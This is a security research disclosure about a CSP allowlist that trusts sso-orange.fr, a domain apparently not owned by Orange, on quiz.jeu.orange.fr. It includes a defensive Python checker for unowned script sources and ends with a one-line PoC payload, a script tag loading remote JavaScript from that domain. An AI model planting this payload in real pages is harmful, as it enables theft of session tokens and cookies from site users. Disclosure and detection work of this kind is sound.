SECURITY RESEARCH

CSP Allowlist Misconfiguration

Affected: quiz.jeu.orange.fr → Controlled domain: sso-orange.fr
Vulnerability
The Content-Security-Policy of quiz.jeu.orange.fr lists sso-orange.fr as a trusted script source. This domain is not owned by Orange. An attacker who registers it can serve arbitrary JavaScript that the browser will execute with full trust in the Orange context.
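A defensive check for this class of misconfiguration, as an added example that is not part of the original write-up: it parses a CSP header and reports script sources whose host is neither an owned domain nor a true subdomain of one. The `OWNED_DOMAINS` inventory and the `SAMPLE_CSP` header are constructed assumptions, since the page does not reproduce the real policy.

```python
# Added example: flag CSP script sources outside an owned-domain inventory.
OWNED_DOMAINS = {"orange.fr"}  # assumption: domains the organisation controls

# Constructed sample header; the real policy is not reproduced on the page.
SAMPLE_CSP = (
    "default-src 'self'; "
    "script-src 'self' 'nonce-abc123' https://*.orange.fr https://sso-orange.fr; "
    "img-src data: https:"
)


def parse_csp(header):
    """Return {directive: [sources]}; the first occurrence of a directive wins."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def source_host(source):
    """Host of a host-source expression; None for keywords and scheme-sources."""
    if source.startswith("'") or source.endswith(":"):
        return None  # 'self', nonces, hashes, or schemes such as https:
    host = source.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]
    if host.startswith("*."):
        host = host[2:]  # a wildcard is judged by the domain it covers
    return host.lower()


def is_owned(host):
    """True only for an owned domain or a real subdomain (dot boundary)."""
    return any(host == d or host.endswith("." + d) for d in OWNED_DOMAINS)


def unowned_script_hosts(header):
    """Hosts allowed to serve scripts that are not in the inventory."""
    policy = parse_csp(header)
    sources = policy.get("script-src", policy.get("default-src", []))
    hosts = [source_host(s) for s in sources]
    return [h for h in hosts if h is not None and not is_owned(h)]


if __name__ == "__main__":
    for host in unowned_script_hosts(SAMPLE_CSP):
        print("script source not in owned-domain inventory:", host)
```

The dot-boundary comparison in `is_owned` is what separates `sso-orange.fr` from `sso.orange.fr`; a plain substring or suffix match on `orange.fr` would accept both.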
Impact
Session token theft, cookie exfiltration, localStorage access, and full script execution in the quiz.jeu.orange.fr origin. Exploitation requires chaining with an HTML/script injection point on the target page.
PoC Payload
<script src="https://sso-orange.fr/poc.js"></script>